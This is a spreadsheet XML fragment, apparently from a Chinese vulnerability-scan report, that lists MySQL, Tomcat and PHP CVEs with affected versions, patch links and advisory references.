    <t>Oracle MySQL Server 安全漏洞(CVE-2018-2696)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html，升级方法链接：https://wenku.baidu.com/view/2b377c66e75c3b3567ec102de2bd960590c6d9d4.html?_wkts_=1669964606353&amp;bdQuery=oracle%E5%8D%87%E7%BA%A7%E6%96%B9%E6%B3%95</t>
  </si>
  <si>
    <t>https://wenku.baidu.com/view/2b377c66e75c3b3567ec102de2bd960590c6d9d4.html?_wkts_=1669964606353&amp;bdQuery=oracle%E5%8D%87%E7%BA%A7%E6%96%B9%E6%B3%95
http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-2703)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201801-664
http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-2590)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201801-766
http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-2645)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201801-718
http://www.securitytracker.com/id/1040216</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-2562)</t>
  </si>
  <si>
    <t>影响MySQL:5.5.0版本(含)到5.5.58版本(含),5.6.0版本(含)到5.6.38版本(含),5.7.0版本(含)到5.7.19版本(含)</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-2640)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201801-723
https://lists.debian.org/debian-lts-announce/2018/06/msg00015.html
http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html
https://www.debian.org/security/2018/dsa-4341
https://access.redhat.com/errata/RHSA-2019:1258
https://www.debian.org/security/2018/dsa-4091
https://access.redhat.com/errata/RHSA-2018:2439
https://usn.ubuntu.com/3537-2/
https://usn.ubuntu.com/3537-1/
https://access.redhat.com/errata/RHSA-2018:0587
https://access.redhat.com/errata/RHSA-2018:0586
https://security.netapp.com/advisory/ntap-20180117-0002/
http://www.securitytracker.com/id/1040216
https://lists.debian.org/debian-lts-announce/2018/01/msg00024.html
https://access.redhat.com/errata/RHSA-2018:2729
https://access.redhat.com/errata/RHSA-2019:1258
https://www.auscert.org.au/bulletins/ESB-2019.1829/
https://packetstormsecurity.com/files/152981/Red-Hat-Security-Advisory-2019-1258-01.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-2665)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201801-701</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-2668)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201801-698</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-2646)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201801-717
http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html</t>
  </si>
  <si>
    <t>Oracle  MySQL Server组件安全漏洞(CVE-2018-2565)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201801-601
http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3453)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1322
https://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html#AppendixMSQL
http://riddle.link/
https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3681811.xml
https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-55.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3599)</t>
  </si>
  <si>
    <t>ips-11000060（有效）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1199</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3309)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1331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</si>
  <si>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Server远程安全漏洞(CVE-2017-3459)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1316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</si>
  <si>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安全漏洞(CVE-2017-3462)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1313
https://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
https://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-36.html
https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3681811.xml
https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3809960.xml
https://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html#AppendixMSQL
http://riddle.link/</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2017-3464)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1311
https://mariadb.com/kb/en/library/mariadb-10030-release-notes/
https://mariadb.com/kb/en/library/mariadb-10122-changelog/
https://mariadb.com/kb/en/mariadb/mariadb-5555-release-notes/
https://mariadb.com/kb/en/library/mariadb-5555-changelog/
https://mariadb.com/kb/en/library/mariadb-1025-release-notes/
https://mariadb.com/kb/en/library/mariadb-1025-changelog/
https://mariadb.com/kb/en/library/mariadb-10030-changelog/
https://mariadb.com/kb/en/library/mariadb-10122-release-notes/</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2017-3465)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1310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</si>
  <si>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安全漏洞(CVE-2017-3467)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1309
https://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3681811.xml
https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3809960.xml
https://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html#AppendixMSQL
https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-18.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server安全漏洞（CVE-2019-2628）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201904-731
https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
http://www.oracle.com/index.html
https://support.f5.com/csp/article/K32798641
http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
https://usn.ubuntu.com/3957-1/
https://access.redhat.com/errata/RHSA-2019:2484
http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00035.html
http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00032.html
https://access.redhat.com/errata/RHSA-2019:2511
https://usn.ubuntu.com/4070-3/
https://www.suse.com/support/update/announcement/2019/suse-su-20192020-1.html
https://www.suse.com/support/update/announcement/2019/suse-su-20192330-1.html
https://access.redhat.com/errata/RHSA-2019:2511
https://usn.ubuntu.com/3957-1/
https://www.suse.com/support/update/announcement/2019/suse-su-20193270-1.html
https://www.auscert.org.au/bulletins/ESB-2019.3409/
https://www.auscert.org.au/bulletins/ESB-2019.3142/
https://vigilance.fr/vulnerability/Oracle-MySQL-vulnerabilities-of-April-2019-29050
https://www.oracle.com/technetwork/security-advisory/cpuapr2019verbose-5072824.html
https://www.auscert.org.au/bulletins/79866
https://www.auscert.org.au/bulletins/ESB-2019.4642/
https://www.auscert.org.au/bulletins/ESB-2019.2853/</t>
  </si>
  <si>
    <t>Oracle MySQL Server安全漏洞（CVE-2019-2614）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201904-744
https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
http://www.oracle.com/index.html
https://usn.ubuntu.com/3957-3/
http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
https://usn.ubuntu.com/3957-1/
https://usn.ubuntu.com/3957-2/
https://support.f5.com/csp/article/K52514501
https://usn.ubuntu.com/3957-3/
https://usn.ubuntu.com/3957-2/
https://usn.ubuntu.com/3957-1/
https://www.suse.com/support/update/announcement/2019/suse-su-20193270-1.html
https://vigilance.fr/vulnerability/Oracle-MySQL-vulnerabilities-of-April-2019-29050
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-api-connect-is-potentially-impacted-by-vulnerabilities-in-mysql/
https://www.oracle.com/technetwork/security-advisory/cpuapr2019verbose-5072824.html
https://www.auscert.org.au/bulletins/79866
https://www.auscert.org.au/bulletins/ESB-2019.1856.2/
https://packetstormsecurity.com/files/153070/Ubuntu-Security-Notice-USN-3957-2.html
https://www.auscert.org.au/bulletins/ESB-2019.1856/
https://www.auscert.org.au/bulletins/ESB-2019.4642/</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件访问控制错误漏洞(CVE-2019-2758)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201907-907
http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
http://www.oracle.com/index.html
https://access.redhat.com/errata/RHSA-2019:2484
https://usn.ubuntu.com/4070-1/
https://usn.ubuntu.com/4070-3/
https://www.suse.com/support/update/announcement/2019/suse-su-20193311-1.html
https://access.redhat.com/errata/RHSA-2019:2511
https://www.suse.com/support/update/announcement/2019/suse-su-20193369-1.html
https://nvd.nist.gov/vuln/detail/CVE-2019-2758
https://vigilance.fr/vulnerability/Oracle-MySQL-vulnerabilities-of-July-2019-29795
https://www.auscert.org.au/bulletins/ESB-2019.3142/
https://www.auscert.org.au/bulletins/ESB-2020.0902/
https://www.auscert.org.au/bulletins/ESB-2019.3849/
https://www.ibm.com/blogs/psirt/security-bulletin-api-connect-is-impacted-by-multiple-vulnerabilities-in-oracle-mysql-2/
https://www.ibm.com/support/pages/node/1078971
https://packetstormsecurity.com/files/154037/Ubuntu-Security-Notice-USN-4070-3.html
https://www.auscert.org.au/bulletins/ESB-2019.2784/
https://www.auscert.org.au/bulletins/ESB-2019.4683/
https://www.auscert.org.au/bulletins/ESB-2019.4773/</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件访问控制错误漏洞(CVE-2019-2740)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201907-913
http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
http://www.oracle.com/index.html
https://seclists.org/bugtraq/2019/Aug/1
https://usn.ubuntu.com/4070-1/
https://packetstormsecurity.com/files/153862/Slackware-Security-Advisory-mariadb-Updates.html
https://www.suse.com/support/update/announcement/2019/suse-su-20193311-1.html
https://access.redhat.com/errata/RHSA-2019:2511
https://usn.ubuntu.com/4070-2/
https://www.suse.com/support/update/announcement/2019/suse-su-20193369-1.html
https://vigilance.fr/vulnerability/Oracle-MySQL-vulnerabilities-of-July-2019-29795
https://www.auscert.org.au/bulletins/ESB-2019.3142/
https://www.auscert.org.au/bulletins/ESB-2020.0902/
https://www.auscert.org.au/bulletins/ESB-2019.3082/
https://www.ibm.com/blogs/psirt/security-bulletin-api-connect-is-impacted-by-multiple-vulnerabilities-in-oracle-mysql-2/
https://packetstormsecurity.com/files/153862/Slackware-Security-Advisory-mariadb-Updates.html
https://nvd.nist.gov/vuln/detail/CVE-2019-2740
https://www.auscert.org.au/bulletins/ESB-2019.2784/
https://www.auscert.org.au/bulletins/ESB-2019.4683/
https://www.auscert.org.au/bulletins/ESB-2019.4773/</t>
  </si>
  <si>
    <t>OpenSSH: 7.6p1</t>
  </si>
  <si>
    <t>Apache Tomcat 资源管理错误漏洞(CVE-2020-11996)</t>
  </si>
  <si>
    <t>Tomcat: 8.5.47</t>
  </si>
  <si>
    <t>影响Tomcat:10.0.0-M1版本(含)到10.0.0-M6版本,9.0.0版本(含)到9.0.36版本,8.5.0版本(含)到8.5.56版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
https://lists.apache.org/thread.html/r5541ef6b6b68b49f76fc4c45695940116da2bcbe0312ef204a00a2e0%40%3Cannounce.tomcat.apache.org%3E</t>
  </si>
  <si>
    <t>https://lists.apache.org/thread.html/r5541ef6b6b68b49f76fc4c45695940116da2bcbe0312ef204a00a2e0%40%3Cannounce.tomcat.apache.org%3E</t>
  </si>
  <si>
    <t>Apache Tomcat 缓冲区错误漏洞(CVE-2020-13934)</t>
  </si>
  <si>
    <t>影响tomcat:10.0.0-M1版本(含)到10.0.0-M6版本(含),9.0.0版本(含)到9.0.36版本(含),8.5.1版本(含)到8.5.56版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
https://lists.apache.org/thread.html/r61f411cf82488d6ec213063fc15feeeb88e31b0ca9c29652ee4f962e%40%3Cannounce.tomcat.apache.org%3E</t>
  </si>
  <si>
    <t>https://lists.apache.org/thread.html/r61f411cf82488d6ec213063fc15feeeb88e31b0ca9c29652ee4f962e%40%3Cannounce.tomcat.apache.org%3E</t>
  </si>
  <si>
    <t>Apache Tomcat 环境问题漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:9.0.0版本(含)到9.0.31版本,8.5.0版本(含)到8.5.51版本,7.0.0版本(含)到7.0.100版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://lists.apache.org/thread.html/r127f76181aceffea2bd4711b03c595d0f115f63e020348fe925a916c%40%3Cannounce.tomcat.apache.org%3E</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202002-1130
https://www.debian.org/security/2020/dsa-4673
https://security-tracker.debian.org/tracker/CVE-2019-17569
https://security-tracker.debian.org/tracker/CVE-2020-1935
https://security-tracker.debian.org/tracker/CVE-2020-1938</t>
  </si>
  <si>
    <t>Apache Tomcat 安全漏洞（CVE-2021-25329）</t>
  </si>
  <si>
    <t>ips-12030714, ips-12030715（有效）</t>
  </si>
  <si>
    <t>影响Tomcat:7.0.0版本(含)到7.0.107版本(含),8.5.0版本(含)到8.5.61版本(含),9.0.0版本(含)到9.0.41版本(含),10.0.0版本(含)到10.0.1版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf%40%3Cannounce.tomcat.apache.org%3E</t>
  </si>
  <si>
    <t>https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf%40%3Cannounce.tomcat.apache.org%3E</t>
  </si>
  <si>
    <t>PHP: 5.3.3</t>
  </si>
  <si>
    <t>PHP‘com_print_typeinfo’函数 缓冲区溢出漏洞(CVE-2012-2376)</t>
  </si>
  <si>
    <t>ips-11020764, ips-11024378（有效）</t>
  </si>
  <si>
    <t>影响PHP:5.4.3以下版本(含)</t>
  </si>
  <si>
    <t>参见《PHP‘com_print_typeinfo’函数 缓冲区溢出漏洞(CVE-2012-2376)-修复方案》</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201205-344
http://www.securitytracker.com/id?1027089</t>
  </si>
  <si>
    <t>PHP 安全漏洞 (CVE-2015-8935)</t>
  </si>
  <si>
    <t>影响PHP:5.4.38以下版本,5.5.0版本(含)到5.5.22版本,5.6.0版本(含)到5.6.6版本</t>
  </si>
  <si>
    <t>参见《PHP 安全漏洞 (CVE-2015-8935)-修复方案》</t>
  </si>
  <si>
    <t>http://www.openwall.com/lists/oss-security/2016/06/20/3
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201606-495
https://github.com/php/php-src/commit/996faf964bba1aec06b153b370a7f20d3dd2bb8b?w=1
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8935
https://www.cnvd.org.cn/flaw/show/CNVD-2016-04262</t>
  </si>
  <si>
    <t>PHP 整数溢出漏洞 (CVE-2016-5095)</t>
  </si>
  <si>
    <t>影响PHP:5.5.36以下版本,5.6.0版本(含)到5.6.22版本</t>
  </si>
  <si>
    <t>参见《PHP 整数溢出漏洞 (CVE-2016-5095)-修复方案》</t>
  </si>
  <si>
    <t>http://php.net/ChangeLog-5.php
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201605-659
http://www.openwall.com/lists/oss-security/2016/05/26/3
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5095
https://www.cnvd.org.cn/flaw/show/CNVD-2016-03661</t>
  </si>
  <si>
    <t>PHP Fileinfo组件代码注入漏洞 (CVE-2014-9426)</t>
  </si>
  <si>
    <t>影响PHP:5.6.4以下版本(含)</t>
  </si>
  <si>
    <t>参见《PHP Fileinfo组件代码注入漏洞 (CVE-2014-9426)-修复方案》</t>
  </si>
  <si>
    <t>http://git.php.net/?p=php-src.git;a=commit;h=a72cd07f2983dc43a6bb35209dc4687852e53c09
https://bugs.php.net/bug.php?id=68665
http://git.php.net/?p=php-src.git;a=commit;h=ef89ab2f99fbd9b7b714556d4f1f50644eb54191
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201412-602
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9426
https://www.cnvd.org.cn/flaw/show/CNVD-2015-00180</t>
  </si>
  <si>
    <t>PHP 安全漏洞 (CVE-2015-4116)</t>
  </si>
  <si>
    <t>影响PHP:5.5.26以下版本(含),5.6版本(含)到5.6.11版本</t>
  </si>
  <si>
    <t>参见《PHP 安全漏洞 (CVE-2015-4116)-修复方案》</t>
  </si>
  <si>
    <t>https://www.htbridge.com/advisory/HTB23262
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201507-328
https://bugs.php.net/bug.php?id=69737
http://git.php.net/?p=php-src.git;a=commit;h=1cbd25ca15383394ffa9ee8601c5de4c0f2f90e1
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4116
https://www.cnvd.org.cn/flaw/show/CNVD-2016-03321</t>
  </si>
  <si>
    <t>PHP multipart/form-data 远程DOS漏洞（CVE-2015-4024）</t>
  </si>
  <si>
    <t>ips-11020495（有效）</t>
  </si>
  <si>
    <t>影响PHP:5.4.41以下版本,5.5.0版本(含)到5.5.25版本,5.6.0版本(含)到5.6.9版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201506-131
http://www.securitytracker.com/id/1032432</t>
  </si>
  <si>
    <t>PHP OS命令注入漏洞(CVE-2015-4642)</t>
  </si>
  <si>
    <t>影响PHP:5.4.42以下版本,5.5.0版本(含)到5.5.26版本,5.6.0版本(含)到5.6.10版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/bug.php?id=69646</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201506-417
https://bugs.php.net/bug.php?id=69646</t>
  </si>
  <si>
    <t>PHP  'ftp_genlist()'函数整数溢出漏洞（CVE-2015-4643）</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/bug.php?id=69545</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201506-416
http://www.securitytracker.com/id/1032709</t>
  </si>
  <si>
    <t>PHP exif_process_TIFF_in_JPEG拒绝服务漏洞(CVE-2016-4544)</t>
  </si>
  <si>
    <t>影响PHP:5.5.34以下版本(含),5.6.0版本(含)到5.6.20版本(含),7.0.0版本(含)到7.0.5版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=082aecfc3a753ad03be82cf14f03ac065723ec92</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201605-157
https://bugs.php.net/bug.php?id=72094</t>
  </si>
  <si>
    <t>Apache Tomcat信息泄露漏洞(CVE-2021-24122)</t>
  </si>
  <si>
    <t>影响Tomcat:7.0.0版本(含)到7.0.106版本(含),8.5.0版本(含)到8.5.59版本(含),9.0.0.M1版本(含)到9.0.39版本(含),10.0.0-M1版本(含)到10.0.0-M9版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁修复漏洞，请受影响用户及时更新官方补丁。官方链接如下：https://tomcat.apache.org/security-10.html</t>
  </si>
  <si>
    <t>https://tomcat.apache.org/security-10.html
https://security.netapp.com/advisory/ntap-20210212-0008/</t>
  </si>
  <si>
    <t>Oracle Java SE和Java SE Embedded 访问控制错误漏洞(CVE-2019-2684)</t>
  </si>
  <si>
    <t>影响Tomcat:9.0.0版本(含)到9.0.28版本(含),8.5.0版本(含)到8.5.47版本(含),7.0.0版本(含)到7.0.97版本(含)</t>
  </si>
  <si>
    <t>Apache Tomcat 环境问题漏洞(CVE-2021-33037)</t>
  </si>
  <si>
    <t>影响Tomcat:8.5.0版本(含)到8.5.66版本(含),9.0.0版本(含)到9.0.46版本(含),10.0.0版本(含)到10.0.6版本(含)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://camel.apache.org/security/https://tomcat.apache.org/security-8.html https://tomcat.apache.org/security-9.html https://tomcat.apache.org/security-10.html</t>
  </si>
  <si>
    <t>https://tomcat.apache.org/security.html
https://www.debian.org/security/2021/dsa-4952
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=991046
https://security-tracker.debian.org/tracker/CVE-2021-30640
https://security-tracker.debian.org/tracker/CVE-2021-33037</t>
  </si>
  <si>
    <t>PHP 'getimagesize()'远程拒绝服务漏洞</t>
  </si>
  <si>
    <t>影响PHP:5.4.1版本,5.3.0版本(含)到5.3.10版本(含),5.2.0版本(含)到5.2.17版本(含),5.1.0版本(含)到5.1.6版本(含),5.0.1版本(含)到5.0.5版本(含)</t>
  </si>
  <si>
    <t>参见《PHP _getimagesize()_远程拒绝服务漏洞-修复方案》</t>
  </si>
  <si>
    <t>PHP 'ibase_gen_id()'函数 单字节溢出漏洞</t>
  </si>
  <si>
    <t>影响PHP:5.3.3版本</t>
  </si>
  <si>
    <t>参见《PHP _ibase_gen_id()_函数 单字节溢出漏洞-修复方案》</t>
  </si>
  <si>
    <t>PHP ‘exif_process_IFD_in_TIFF’函数信息泄露漏洞(CVE-2016-7128)</t>
  </si>
  <si>
    <t>影响PHP:5.6.25以下版本,7.0版本(含)到7.0.10版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201609-175
https://bugs.php.net/bug.php?id=72627</t>
  </si>
  <si>
    <t>PHP ZipArchive::getArchiveComment()函数空指针引用拒绝服务漏洞</t>
  </si>
  <si>
    <t>影响PHP:5.2.0版本(含)到5.2.14版本(含),5.3.0版本(含)到5.3.3版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://securityreason.com/achievement_securityalert/90</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201011-095
http://www.php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP “substr_replace()”释放后重用远程内存破坏漏洞(CVE-2011-1148)</t>
  </si>
  <si>
    <t>影响PHP:5.3.6以下版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.php.net/</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201103-226
https://exchange.xforce.ibmcloud.com/vulnerabilities/66080</t>
  </si>
  <si>
    <t>PHP “Zip”扩展“stream_get_contents()”函数拒绝服务漏洞</t>
  </si>
  <si>
    <t>ips-11020088（有效）</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.php.net/downloads.php</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201103-264</t>
  </si>
  <si>
    <t>PHP “OpenSSL”扩展多个拒绝服务漏洞</t>
  </si>
  <si>
    <t>影响PHP:5.3.5以下版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201103-262
http://www.php.net/releases/5_3_6.php</t>
  </si>
  <si>
    <t>PHP目录遍历漏洞（CVE-2012-1172）</t>
  </si>
  <si>
    <t>影响PHP:5.0版本(含)到5.4.0版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.php.net/archive/2012.php#id2012-04-26-1</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201205-121
http://www.php.net/ChangeLog-5.php#5.4.0</t>
  </si>
  <si>
    <t>PHP zend_strtod函数畸形浮点值数字错误漏洞</t>
  </si>
  <si>
    <t>ips-11020131（无效）</t>
  </si>
  <si>
    <t>影响PHP:5.3.0版本(含)到5.3.5版本,5.2.0版本(含)到5.2.17版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://svn.php.net/viewvc?view=revision&amp;revision=305032</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-099</t>
  </si>
  <si>
    <t>Apache Tomcat 安全漏洞(CVE-2020-13943)</t>
  </si>
  <si>
    <t>影响tomcat:10.0.0-M1版本(含)到10.0.0-M7版本(含),9.0.0版本(含)到9.0.37版本(含),8.5.0版本(含)到8.5.57版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
https://github.com/apache/tomcat</t>
  </si>
  <si>
    <t>Apache Tomcat 授权问题漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:9.0.0版本(含)到9.0.30版本,8.5.0版本(含)到8.5.50版本,7.0.0版本(含)到7.0.99版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：http://tomcat.apache.org/security-9.html</t>
  </si>
  <si>
    <t>https://usn.ubuntu.com/4251-1/
http://tomcat.apache.org/security-9.html</t>
  </si>
  <si>
    <t>Apache Tomcat 安全漏洞（CVE-2021-25122）</t>
  </si>
  <si>
    <t>影响Tomcat:8.5.0版本(含)到8.5.61版本(含),9.0.0版本(含)到9.0.41版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7%40%3Cannounce.tomcat.apache.org%3E</t>
  </si>
  <si>
    <t>https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7%40%3Cannounce.tomcat.apache.org%3E</t>
  </si>
  <si>
    <t>Apache Tomcat 拒绝服务漏洞(CVE-2021-41079)</t>
  </si>
  <si>
    <t>影响Tomcat:8.5.0版本(含)到8.5.64版本,9.0.0版本(含)到9.0.44版本,10.0.0版本(含)到10.0.2版本(含)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接https://tomcat.apache.org/security-8.html、https://tomcat.apache.org/security-9.html、https://tomcat.apache.org/security-10.html</t>
  </si>
  <si>
    <t>https://tomcat.apache.org/security.html
https://lists.apache.org/thread.html/r6b6b674e3f168dd010e67dbe6848b866e2acf26371452fdae313b98a@%3Cusers.tomcat.apache.org%3E
https://tomcat.apache.org/security-8.html
https://tomcat.apache.org/security-9.html
https://tomcat.apache.org/security-10.html</t>
  </si>
  <si>
    <t>Apache Tomcat信息泄露漏洞(CVE-2024-21733)</t>
  </si>
  <si>
    <t>影响Tomcat:8.5.7版本(含)到8.5.64版本,9.0.1版本(含)到9.0.44版本</t>
  </si>
  <si>
    <t>厂商补丁:目前该漏洞已经修复，受影响用户可升级到以下版本：Apache Tomcat &gt;= 9.0.44Apache Tomcat &gt;= 8.5.64下载链接：https://tomcat.apache.org/index.html</t>
  </si>
  <si>
    <t>PHP 缓冲区错误漏洞(CVE-2019-6977)</t>
  </si>
  <si>
    <t>影响PHP:7.0.0版本(含)到7.1.26版本,7.2.0版本(含)到7.2.14版本,5.6.40以下版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201901-920
http://php.net/ChangeLog-5.php
https://www.exploit-db.com/exploits/46677/</t>
  </si>
  <si>
    <t>PHP OpenSSL Extension 'openssl_x509_parse()'内存破坏漏洞(CVE-2013-6420)</t>
  </si>
  <si>
    <t>ips-11021953, ips-11021954, ips-11024365, ips-11024366, ips-11024367, ips-11024368（有效）</t>
  </si>
  <si>
